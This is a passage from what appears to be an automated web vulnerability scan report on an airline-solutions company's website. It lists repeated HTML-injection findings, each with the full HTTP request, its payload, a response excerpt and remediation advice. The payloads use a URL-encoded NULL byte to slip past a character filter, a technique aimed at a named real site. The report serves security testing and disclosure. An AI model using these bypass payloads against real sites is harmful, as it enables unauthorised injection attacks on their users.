The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/event/2009_sabresonic_loyalty_user_conference?%0071aa9"><a>a46e784cedb=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/events/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322311; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="/home/news_events/event/2009_sabresonic_loyalty_user_conference?%0071aa9"><a>a46e784cedb=1"> ...[SNIP]...
3.105. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001f710<a>ed5b0b7211d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f710<a>ed5b0b7211d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/event/operations_user_conference?%001f710<a>ed5b0b7211d=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/events/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a>ed5b0b7211d=1">operations user conference?%001f710<a>ed5b0b7211d=1</a> ...[SNIP]...
3.106. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ae971"><a>710f86d987f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae971"><a>710f86d987f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/event/operations_user_conference?%00ae971"><a>710f86d987f=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/events/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="/home/news_events/event/operations_user_conference?%00ae971"><a>710f86d987f=1"> ...[SNIP]...
3.107. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference2 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0053da6"><a>69ed5e196d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 53da6"><a>69ed5e196d9 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/event/operations_user_conference2?%0053da6"><a>69ed5e196d9=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="/home/news_events/event/operations_user_conference2?%0053da6"><a>69ed5e196d9=1"> ...[SNIP]...
3.108. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_airmax_group_manager_user_conference [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %005dcdb<a>b490fc50a32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5dcdb<a>b490fc50a32 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/event/sabre_airmax_group_manager_user_conference?%005dcdb<a>b490fc50a32=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/events/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322312; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a>b490fc50a32=1">sabre airmax group manager user conference?%005dcdb<a>b490fc50a32=1</a> ...[SNIP]...
3.109. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_airmax_group_manager_user_conference [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005d2c1"><a>4ad3ce3d1ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d2c1"><a>4ad3ce3d1ba in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/event/sabre_airmax_group_manager_user_conference?%005d2c1"><a>4ad3ce3d1ba=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/events/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322312; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="/home/news_events/event/sabre_airmax_group_manager_user_conference?%005d2c1"><a>4ad3ce3d1ba=1"> ...[SNIP]...
3.110. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_developers_conference [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %004724d<a>de69e323185 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4724d<a>de69e323185 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/event/sabre_developers_conference?%004724d<a>de69e323185=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/events/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322323; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A3%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a>de69e323185=1">sabre developers conference?%004724d<a>de69e323185=1</a> ...[SNIP]...
3.111. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_developers_conference [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009ed1a"><a>8673101f51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ed1a"><a>8673101f51b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/event/sabre_developers_conference?%009ed1a"><a>8673101f51b=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/events/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322323; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A3%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="/home/news_events/event/sabre_developers_conference?%009ed1a"><a>8673101f51b=1"> ...[SNIP]...
3.112. http://www.sabreairlinesolutions.com/home/news_events/event/sabresonic_global_conference2 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fa4dd"><a>9d5dbf18594 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa4dd"><a>9d5dbf18594 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/event/sabresonic_global_conference2?%00fa4dd"><a>9d5dbf18594=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="/home/news_events/event/sabresonic_global_conference2?%00fa4dd"><a>9d5dbf18594=1"> ...[SNIP]...
3.113. http://www.sabreairlinesolutions.com/home/news_events/events [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/news_events/events
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001a64e<a>01c1bfa4f75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a64e<a>01c1bfa4f75 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/events?%001a64e<a>01c1bfa4f75=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a>01c1bfa4f75=1">events?%001a64e<a>01c1bfa4f75=1</a> ...[SNIP]...
3.114. http://www.sabreairlinesolutions.com/home/news_events/events [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/news_events/events
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d477e"><a>99c5e77902a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d477e"><a>99c5e77902a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/events?%00d477e"><a>99c5e77902a=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="/home/news_events/events?%00d477e"><a>99c5e77902a=1"> ...[SNIP]...
3.115. http://www.sabreairlinesolutions.com/home/news_events/events/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/news_events/events/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dab69"><a>b2f5fb7df3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dab69"><a>b2f5fb7df3c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/events/?%00dab69"><a>b2f5fb7df3c=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="/home/news_events/events/?%00dab69"><a>b2f5fb7df3c=1"> ...[SNIP]...
3.116. http://www.sabreairlinesolutions.com/home/news_events/news [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/news_events/news
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0014294<a>0ea98cb94ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14294<a>0ea98cb94ed in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
